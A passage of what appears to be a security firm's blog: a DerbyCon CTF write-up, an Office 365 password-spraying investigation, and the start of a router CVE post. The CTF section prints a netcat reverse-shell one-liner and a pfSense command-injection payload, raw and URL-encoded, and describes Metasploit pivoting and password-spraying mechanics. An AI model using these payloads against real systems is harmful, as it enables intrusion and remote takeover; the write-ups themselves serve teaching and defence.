In order to get the flag, we just needed to combine the two into the_pass@12345!) which, when submitted, returned 500 points.


The file arm-hard.binary contained an ELF executable which spelled out a flag by writing successive characters to the R0 register. It did this using a method which resembles Return Oriented Programming (ROP), whereby a list of function addresses is pushed onto the stack, and then as each one returns, it invokes the next one from the list.

ROP is a technique which would more usually be found in shellcode. It was developed as a way to perform stack-based buffer overflow attacks, even if the memory containing the stack is marked as non-executable. The fragments of code executed – known as ‘gadgets’ – are normally chosen opportunistically from whatever happens to be available within the code segment. In this instance there was no need for that, because the binary had been written to contain exactly the code fragments needed, and ROP was merely being used to obfuscate the control flow.

To further obfuscate the behaviour, each of the characters was formed by adding an offset to the value 0x61 (ASCII a). This was done from a base value in register R1 (calculated as 0x5a + 0x07 = 0x61):

For example, here is the gadget for writing a letter n to R0 (calculated as 0x61 + 0x0d = 0x6e):

and here is the gadget for a capital letter B:

The gadget addresses were calculated as offsets too, from a base address held in register R10 and equal to the address of the first gadget (0x853c). For example:

Here the address placed in R11 by the first instruction is equal to 0x853c + 0x30 = 0x856c, which as we saw above is the gadget for writing the letter n. The second instruction pushes it onto the stack. By stringing a sequence of these operations together it was possible to spell out a message:

The gadgets referred to above correspond respectively to the letters n, o, c, y, b, r, e and d. Since the return stack operates on the principle of first-in, last-out, they are executed in reverse order and so spell out the word derbycon (part of the flag). To start the process going, the program simply popped the first gadget address off the stack then returned to it:
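Putting the arithmetic together, the fragment can be reconstructed in a few lines of Python (only the 0x0d offset for n is quoted above; the remaining offsets are inferred from the letters themselves):

```python
BASE_CHAR = 0x5A + 0x07   # 0x61, ASCII 'a', held in R1
GADGET_BASE = 0x853C      # address of the first gadget, held in R10

# Offsets added to BASE_CHAR by each gadget, in push order
# (n, o, c, y, b, r, e, d).
pushed_offsets = [0x0D, 0x0E, 0x02, 0x18, 0x01, 0x11, 0x04, 0x03]

# The return stack is first-in, last-out, so execution order is the
# reverse of push order.
word = "".join(chr(BASE_CHAR + off) for off in reversed(pushed_offsets))
print(word)  # derbycon

# Gadget addresses were offsets from GADGET_BASE in the same way,
# e.g. the 'n' gadget at 0x853c + 0x30:
assert GADGET_BASE + 0x30 == 0x856C
```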

The full flag, which took the form of an e-mail address, was found by extending this analysis to include all of the gadget addresses pushed onto the stack:

  • BlahBlahBlahBobLobLaw@derbycon.com


We noticed that a server was running IIS 6 and had WebDAV enabled. Experience led us to believe that this combination meant it would likely be vulnerable to CVE-2017-7269. Fortunately for us, there is publicly available exploit code included in the Metasploit framework:

The exploit ran as expected and we were able to collect a number of basic flags from this server.

Once we’d collected all of the obvious flags, we began to look at the server in a bit more detail. We ran a simple net view command and identified that the compromised server, NUKELAUNCH, could see a server named NUKELAUNCHDB.

A quick port scan from our laptops indicated that this server was live, but had no ports open. However, the server was in scope so there must be a way to access it. We assumed that there was some network segregation in place, so we used the initial server as a pivot point to forward traffic.

Bingo, port 1433 was open on NUKELAUNCHDB, as long as you routed via NUKELAUNCH.

We utilized Metasploit’s built-in pivoting functionality to push traffic to NUKELAUNCHDB via NUKELAUNCH. This was set up by simply adding a route, something similar to route add NUKELAUNCHDB 10, where 10 was the session number we wished to route through. We then started Metasploit’s SOCKS proxy server. This allowed us to utilize other tools and push their traffic to NUKELAUNCHDB through proxychains.

At this stage, we made some educated guesses about the password for the sa account and used CLR-based custom stored procedures (http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/) to gain access to the underlying operating system on NUKELAUNCHDB.


From the HTTP response headers, we identified this host was running a vulnerable version of Home Web Server.

Some cursory research led to the following exploit-db page:

It detailed a path traversal attack which could be used to execute binaries on the affected machine. Initial attempts to utilise this flaw to run encoded PowerShell commands were unsuccessful, so we had a look for other exploitation vectors.

The web application had what appeared to be file upload functionality, but it didn’t seem to be fully functional.

There was, however, a note on the page explaining that FTP could still be used for uploads, so that was the next port of call.

Anonymous FTP access was enabled, so we were able to simply log in and upload an executable. At this stage we could upload files to the target system and run binaries. The only thing missing was the full path to the binary that we’d uploaded. Fortunately, there was a text file in the cgi-bin detailing the upload configuration:

The only step remaining was to run the binary we’d uploaded. The following web request did the job and we were granted access to the system.

The flags were scattered around the filesystem and the MSSQL database. One of the flags was found on the user’s desktop in a format that required graphical access, so we enabled RDP to grab that one.


This challenge was based on a vulnerability discovered by Scott White (@s4squatch) shortly before DerbyCon 2017. It wasn’t quite a 0day (Scott had reported it to pfSense and it was vaguely mentioned in the patch notes) but there was very limited public information about this at the time of the CTF.

The box presented us with a single open TCP port: 443, serving a website over HTTPS. Visiting the site revealed the login page of an instance of the open source firewall software pfSense.


We attempted to guess the password. The typical default username and password is admin:pfsense; however this, along with a few other common combinations for the admin user, failed to grant us entry.

After a short while, we changed the user to pfsense and tried a password of pfsense, and we were in. The pfsense user provided us with a small number of low value flags.

At first glance, the challenge seemed trivial. pfSense has a page called exec.php that can call system commands and run PHP code. However, we soon realised that the pfsense user held almost no privileges. We only had access to a small number of pages. We could install widgets, view some system information – including version numbers – and upload files via the picture widget. Despite all this, there appeared to be very little in the way of options to get a shell on the box.

We then decided to grab a directory listing of all the pages provided by pfSense. We grabbed a copy of the software and copied all of the page paths and names from the file system. Then, using the resulting list in combination with the DirBuster tool for automation, we requested every page to determine whether there was anything else that we did have access to. Two pages returned an HTTP 200 OK status.

  • index.php – We already have this.
  • system_groupmanager.php – Hmm…

Browsing to system_groupmanager.php yielded another slightly higher value flag.

This page is responsible for managing members of groups and the privileges they have; awesome! We realised our user was not a member of the “admin” group, so we made that happen and… nothing. No change to the interface and no ability to access a page like exec.php.

A few hours were burned looking for various vulnerabilities, but to no avail. When looking at the source code, nothing immediately jumped out as vulnerable within the page itself, but pfSense does make heavy use of includes and our review was fairly manual.

With time passing, a Google search for “system_groupmanager.php exploit” was performed and… urgh, why didn’t we do that straight away? Sleep deprivation was probably why.

There was a brief description of the vulnerability and a link to the actual pfSense security advisory notice:

A little more information was revealed, including the discoverer of the issue, who happened to be sitting at the front on the stage as one of the CTF crew: Scott White from TrustedSec. Heh. This confirmed the likelihood that we were on the right track. However, he had not provided any public proof of concept code and searches did not reveal any authored by anyone else either.

The little information provided in the advisory included this paragraph:

“A command-injection vulnerability exists in auth.inc via system_groupmanager.php.

This allows an authenticated WebGUI user with privileges for system_groupmanager.php to execute commands in the context of the root user.”

With a new file as our target for code review and a target parameter, finding the vulnerability would have been considerably easier, but we could do better than that.

pfSense is an open source project which uses GitHub for their version control. By reviewing the commit history associated with auth.inc we quickly identified the affected lines of code, further simplifying our search for the vulnerability. Even better, the information contained within the footer of the security advisory revealed the patched version of the software (2.3.1), further narrowing the timeline of our search.

Having identified the particular line of code we could then understand the execution pathway:

  1. A numeric user ID is submitted within code contained in /usr/local/www/system_groupmanager.php
  2. This is passed to the local_group_set() function within /etc/inc/auth.inc as a PHP array.
  3. An implode() is performed on the incoming array to turn the array object into a single string object, concatenated using commas.
  4. This is then passed to a function called mwexec() without first undergoing any kind of escaping or filtering, which appears to call a system binary /usr/sbin/pw with the stringified array now part of its arguments.
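The pathway above can be simulated in a few lines of Python to show why a quote in the members value is fatal (the command template is paraphrased from the steps above, not copied from auth.inc, and the group name and flags are approximate):

```python
# members[] as submitted in the POST request; a single element here,
# using a succinct form of the quote breakout.
members = ["0';/sbin/ping -c 1;'"]

# Step 3: implode() turns the array into a comma-separated string.
member_list = ",".join(members)

# Step 4: the string lands, unescaped, inside the pw command line.
cmd = f"/usr/sbin/pw groupmod test -g 2003 -M '{member_list}'"
print(cmd)
# /usr/sbin/pw groupmod test -g 2003 -M '0';/sbin/ping -c 1;''
```

The shell now sees the pw invocation terminated after `-M '0'`, followed by our injected ping as a separate command.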

In order to exploit this vulnerability, we needed to escape the string with a quote and type a suitable command.

Initial attempts made directly against the production box resulted in failure. As the injection was blind and didn’t return information to the webpage, we opted to use the ping command and then monitored incoming traffic using Wireshark to confirm success.

Despite having a good understanding of what was happening under the hood, something was still failing. We stood up a test environment with the same version of the pfSense software (2.2.6) and tried the same command. This led to the same problem; no command execution. However, as we had administrative access to our own instance, we could view the system logs and the errors being caused.

Somehow, /sbin/ping or the IP address was being returned as an invalid user ID by the pw application, suggesting that the string escape was not wholly successful and that /usr/sbin/pw was in fact treating our command as a command line argument, which was not what we wanted.

Some more playing with quotes and escape sequences followed, before the following string resulted in a successful execution of ping and ICMP packets flooded into our network interfaces.

  • 0';/sbin/ping -c 1; /usr/bin/pw groupmod test -g 2003 -M '0

Attempting the same input on the live CTF environment also resulted in success. We had achieved command execution. At the time, no one had rooted the box and there was a need for speed if we wanted to be the winners of the challenge coin offered by @DerbyconCTF on Twitter.

On reflection, we believe this could be made much more succinct with:

  • 0';/sbin/ping -c 1;'

We think all of our escaping problems were down to the termination of the command with the appropriate number of quotes but, as previously stated, during the competition we went with the longer version as it just worked.

Next step… how do we get a shell?

pfSense is a cut-down version of FreeBSD under the hood. There is no wget, there is no curl. Yes, we could write something into the web directory using cat, but instead we opted for a traditional old-school reverse shell one-liner. Thank you to @PentestMonkey and his cheat sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet):

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 12345 >/tmp/f

We fired up a netcat listener on our end and used the above as part of the full parameter:

  • 0'; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 12345 >/tmp/f;/usr/sbin/pw groupmod test -g 2003 -M '0

Or, when URL encoded and part of the members parameter in the post request:

  • &members=%5B%5D=0'%3brm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f%3b/usr/sbin/pw+groupmod+test+-g+2003+-M+'0

With the attack string worked out, we triggered the exploit by moving a user into a group and hitting save.

Apologies for the quality of the following photographs – blame technical problems!

This caused the code to run, create a reverse connection back to us and allowed us to capture the final flag of the pfSense challenge, contained in /root/flag.txt.

And with that, we obtained 5000 points, along with the first of two TrustedSec challenge coins awarded to our team.

DPRK Strategic Missile Attack Planner

This box presented a text based game over telnet.

We thought that this box was going to be a lot harder than it turned out to be and, after spending a while trying a few things, we made a tactical decision to ignore it. Somewhat frustratingly for us, that was the wrong move and compromising this box turned out to be very achievable.

From the help command, we thought that it might be Ruby command injection. After chatting with the SwAG team after the end of the CTF, we learned that this was correct and it was a case of finding the correct spot to inject Ruby commands. Props to SwAG and other teams for getting this one, and thanks to the DerbyCon CTF organisers for allowing us to grab some screenshots after the competition had finished in order to share this with you. We’ll share what we know about this box, but wish to make it clear that we failed to root it during the competition.

We were supplied with a help command, which led us to suspect Ruby command injection was at play. The help command printed out various in-game commands as well as public/private functions. A small sample of these were as follows:

  • target=
  • position
  • position=
  • id
  • yield=
  • arm!
  • armed?

The ones that helped us to identify that it was Ruby code behind the scenes were:

  • equal?
  • instance_eval
  • instance_exec

We attempted a few attack vectors manually, but it was taking too long, so we needed a way to automate things. To do this we generated a custom script using expect. In case you don’t know about expect, the following is taken directly from Wikipedia:

“Expect, an extension to the Tcl scripting language written by Don Libes, is a program to automate interactions with programs that expose a text terminal interface.”

We often have to throw custom scripts together to automate various tasks, so if you’re not familiar with this it’s worth a look. The code we implemented to automate the task was as follows:

We then took all of the commands from the game and ran them through the expect script:

  • cat commands | xargs -I{} ./expect.sh {} | grep "Enter Command:" -A 1

After identifying what we thought was the right sequence within the game, we then tried multiple injection techniques with no success. A sample of these are shown below:

  • cat commands | xargs -I{} ./expect.sh {} print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}&& print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}|| print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}; print 1 | grep "Enter Command:" -A 1

We also tried getting the host to ping us back using exec or system, as we didn’t know whether the injection would be blind or show its results on screen:

  • cat commands | xargs -I{} ./expect.sh {} exec(ping

It was not easy to identify the host operating system, so we had to make sure we ran commands that would work on both Windows and Linux. No ports other than telnet were open and you couldn’t even ping the host to find the TTL as there was a firewall blocking all other inbound connections.

In the end, we were not successful.

After discussing this with team SwAG post CTF, they put us out of our misery and let us know what the injection technique was. It was a case of using the eval statement in Ruby followed by a back ticked command, for example:

D’oh! It should also be noted that you couldn’t use spaces in the payload, so if you found the execution point you would have had to get around that restriction, although doing so would be fairly trivial.

Automating re-exploitation

Finally, a quick word about efficiency.

Over the course of the CTF a number of the machines were reset to a known good state at regular intervals, because they were crashed by people running unstable exploits that were never going to work *cough*DirtyCow*cough*. This meant access to compromised systems had to be re-obtained on a fairly regular basis.

In an effort to speed up this process, we threw together some quick scripts to automate the exploitation of some of the hosts. An example of one of them is shown below:

It was well worth the small amount of time it took to do this, and by the end of the CTF we had a script that more or less auto-pwned every box we had shell on.
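In spirit, each script boiled down to something like the following Python sketch (the host, port and exploit command are illustrative placeholders, not the actual CTF values):

```python
import socket
import subprocess
import time

TARGET = "192.0.2.10"                           # placeholder target
SHELL_PORT = 4444                               # placeholder check port
EXPLOIT_CMD = ["python", "exploit.py", TARGET]  # placeholder exploit

def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def watch(interval: int = 60) -> None:
    """Re-run the exploit whenever the shell port stops answering,
    i.e. whenever the box has been reset."""
    while True:
        if not port_open(TARGET, SHELL_PORT):
            subprocess.run(EXPLOIT_CMD)
        time.sleep(interval)
```

Leave watch() running in a spare terminal and the box effectively re-pwns itself after every reset.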


We regularly attend DerbyCon and we firmly believe it to be one of the highest quality and welcoming experiences in the infosec scene. We always come away from it feeling reinvigorated in our professional work (once we’ve got over the exhaustion!) and having made new friends, as well as catching up with old ones. It was great that we were able to come first in the CTF, but that was just the icing on the cake. We’d like to extend a big thank you to the many folks who work tirelessly to put on such a great experience – you know who you are!


Lifting the clouds from cloud investigations

Nettitude’s IR team recently had an opportunity to investigate a breach in a cloud environment. The client had recently adopted Office 365 in a hybrid configuration to host a range of Microsoft services for users, including email and SharePoint. They had seen very heavy traffic on their web application and traced the activity back to an admin user. They had seen that this user had requested a password change for the web application; the new credentials were sent to the user’s corporate email account, therefore the assumption was that the user’s corporate email account had been compromised. Several other user accounts had also requested password resets in the web application around the same time as the suspect administrator account. We were asked to determine if the corporate accounts had been compromised and, if so, how.

Office 365

This was a good opportunity to investigate Office 365 installations. Some interesting discoveries were made, which will be shared in this post.

We discovered that Multi-Factor Authentication (MFA) was not enabled for the cloud environment. MFA is not enabled by default when Office 365 is deployed. In addition, it is not possible to configure the lock-out policy for failed logon attempts beyond the default of 10 failures.

We quickly developed a hypothesis that the impacted accounts had been brute forced. The client informed us that they had already eliminated this possibility from an analysis of the log files; there were no extensive incidents of failed logons in the time leading up to the suspected compromise. We therefore requested access to the audit logs in Office 365 in order to validate their findings. The audit log interface can be found in the Security & Compliance Centre component of the web interface.

Anyone who has had to do a live analysis of Office 365 will know that it can be a frustrating experience. The investigator is presented with a limited web interface and must configure their search criteria in that interface. Results are presented in batches of 150 logs; to view the next 150 results the investigator must pull down a slider in the web interface and wait, often for minutes, before the results are presented. You then repeat this process in order to view the next batch of 150 logs, and so on.

You will find that analysis is much quicker if you use the “export” feature to export all of the filtered audit logs to a spreadsheet. However, this will present the investigator with a new set of challenges. Firstly, you should understand that auditing, when enabled, will log a vast array of user operations, many of which will not be relevant to the investigation. Secondly, the exported logs are not very user-friendly at all. Each record consists of four fields:

  • CreationDate
  • UserID
  • Operations
  • AuditData

There is a vast array of key-value pairs, many of which are concatenated into the single field named AuditData. Thus an example of a single record might look something like this (much of the data has been edited to obscure traceable indicators):

The structure is not static across all records; the contents of the AuditData field will change depending what user operation has been performed. Therefore there will be a varying number of key-pair fields present which makes writing a parser challenging. Fortunately, Microsoft have published both the detailed audit properties and the Office 365 management activity API schema that we can use to understand the data in the audit logs.
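As a starting point, the export can be flattened with a few lines of Python (field names as in the export described above; this helper is a sketch, not a complete parser):

```python
import csv
import json

def parse_audit_export(fileobj):
    """Yield one flat dict per exported Office 365 audit record.

    The variable key-value pairs live in the AuditData JSON blob,
    which we merge into the fixed fields of each row.
    """
    for row in csv.DictReader(fileobj):
        audit = json.loads(row["AuditData"])
        yield {"CreationDate": row["CreationDate"],
               "UserID": row["UserID"],
               "Operation": row["Operations"],
               **audit}
```

From there, filtering on a given Operation value or pivoting on fields pulled out of AuditData (such as the source IP address) becomes a one-liner.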

Log Analysis

In the absence of an existing parser, we had a requirement to quickly process these logs so that the data could be analysed and presented in an understandable format. Realising that the data was structured, albeit with variable numbers of key-value pairs, we turned to our Swiss army knife for structured data – Microsoft Log Parser and Log Parser Studio front end.

For those not familiar with this tool, it is produced by Microsoft and allows a user to execute SQL-like queries against structured data to extract fields of interest from that data. We have previously published some LogParser queries to process sysmon event logs.

We wrote some quick and dirty queries to process exported Office 365 audit data. They are by no means comprehensive, but they should be sufficient to get you started if you need to analyse Office 365 audit log data. We are therefore publishing them for the wider community in our Github repository.

Below is an example of the LogParser query that we wrote to extract Failed Logon operations from the audit logs:

Analysis Results

Our initial analysis of the audit data matched the client’s findings; there was very little indication of failed logons to the impacted accounts prior to the suspected breach. However, our initial analysis was “vertical”; that is to say that it focused on a single user account suspected of being compromised. We know from the daily investigations that we perform for our clients using our SOC managed service that you don’t get the full picture unless you do both a vertical AND a horizontal analysis. A horizontal analysis is one that encompasses all user accounts across a particular time-frame – normally one that includes the suspected time of a compromise.

We therefore re-oriented our investigation to perform a horizontal analysis. We exported all of the Office 365 audit data for all operations on all user accounts across a 30 minute time frame in the early hours of the morning of the suspected breach, when you would expect very little user activity. Our first finding was that there was a significant volume of activity in the logs, encompassing every single user account in the client’s estate. Once we applied our LogParser queries to the log data, it immediately became clear how the attack had occurred and succeeded. The data showed the unmistakable fingerprint of a password spraying attack.

Password Spraying

Password spraying is a variation on the traditional brute force attack. A traditional brute force is directed against a single user account; a dictionary of potential passwords is attempted in sequence until the correct one is found or the dictionary is exhausted, in which case the attacker will configure a new account name to attack and launch the dictionary attack on that account. However, an entry in a log file may be recorded for each failed attempt, so any organisation monitoring logs for failed attempts can detect this attack. In addition, the way to defend your organisation against such attacks is to configure a lock-out threshold on each user account, so that no further attempts to authenticate are permitted after a pre-configured number of failed attempts within a specified time frame.

Password spraying is a technique used by attackers to circumvent the previously described controls. Instead of attacking a single user account, the technique involves attacking a large number of accounts but with a potentially smaller dictionary. So if an attacker has a list of 300 user accounts and a dictionary of 2 passwords, the sequence of the attack would be:

  • UserAcct1: Password1
  • UserAcct2: Password1
  • UserAcct3: Password1
  • <snip>
  • UserAcct300:Password1
  • UserAcct1: Password2
  • UserAcct2: Password2
  • UserAcct3: Password2
  • <etc>

If the attacker is smart, they will throttle the attack in order to avoid any potential lock-out time thresholds. By the time the second password attempt is attempted on any particular account, hopefully (from the attacker’s point of view), the account will have moved outside of the lock-out threshold time frame. That is what happened in our investigation; the attacker had a list of over 1000 user accounts and was throttling their attack so that although they were trying one username/password combination per second, any particular user account was only subjected to about 2 password guesses per hour. This illustrates the value of conducting both horizontal and vertical analysis.
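The ordering is the whole trick, and is easy to express in Python (the account and password values are the illustrative ones from the sequence above):

```python
from itertools import product

users = [f"UserAcct{i}" for i in range(1, 301)]
passwords = ["Password1", "Password2"]

# Passwords form the OUTER loop: every account sees Password1 before any
# account sees Password2, so per-account failures stay far apart in time
# and slip under the lock-out threshold.
attempts = [(user, pwd) for pwd, user in product(passwords, users)]

print(attempts[0])    # ('UserAcct1', 'Password1')
print(attempts[300])  # ('UserAcct1', 'Password2')
```

Add a sleep between attempts, as the attacker in our investigation did, and each individual account only accumulates a couple of failures per hour.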

Analysis Conclusions

Our analysis concluded that 12 accounts had been successfully compromised during the password spraying attack. The indications were that the attacker only needed a dictionary of 100 potential passwords (or fewer) to compromise those 12 accounts. The average number of password guesses across the compromised accounts was around 60 before compromise, while the fewest guesses required to compromise an account was 16. It was determined that the attack had been ongoing for over 24 hours before any component of it was detected.

It was determined that the client was using a password policy of a minimum of 8 character passwords, which is the default password policy for Office 365.

Investigation Curiosities

It was noted, during the investigation of the Office 365 logs, that the logs were inconsistent in terms of recording successful logons. We found that analysis of the logs from the client’s Azure AD installation gave a much higher-fidelity view of successful logons.

There were also anomalies in the time stamps of some of the operations recorded in the Office 365 audit logs. We determined that users were spread over a number of different time zones and concluded that they had failed to configure the correct time zone when they first logged in to their Office 365 accounts. This can have a significant negative impact on the accuracy of the audit logs in Office 365 – we therefore advise all investigators to be cognisant of this issue.

The attacker appeared to have a very accurate and comprehensive list of valid user accounts relevant to the target organisation. We concluded that this was obtained during a previous compromise of a user account within the organisation, wherein the attacker downloaded the Global Address Book from the compromised account.


To summarise, the takeaways from this investigation:

  • Ensure MFA is enabled on your O365 installation.
  • Educate your users about password security.
  • Watch your logs; consider implementing a SIEM solution.
  • Export the logs from both O365 and Azure AD during an investigation.
  • Conduct a horizontal and vertical analysis of user logs for most accurate results.
  • Ensure that all users configure their correct time zone when they first log in to Office365.

CVE-2017-8116: Teltonika router unauthenticated remote code execution

We sometimes require internet connectivity in situations where a traditional connection is not easily possible. 4G routers provide an answer to this problem by providing connectivity to a variety of devices and systems without the need for a fixed internet connection. They typically have one thing in common – a web based management interface.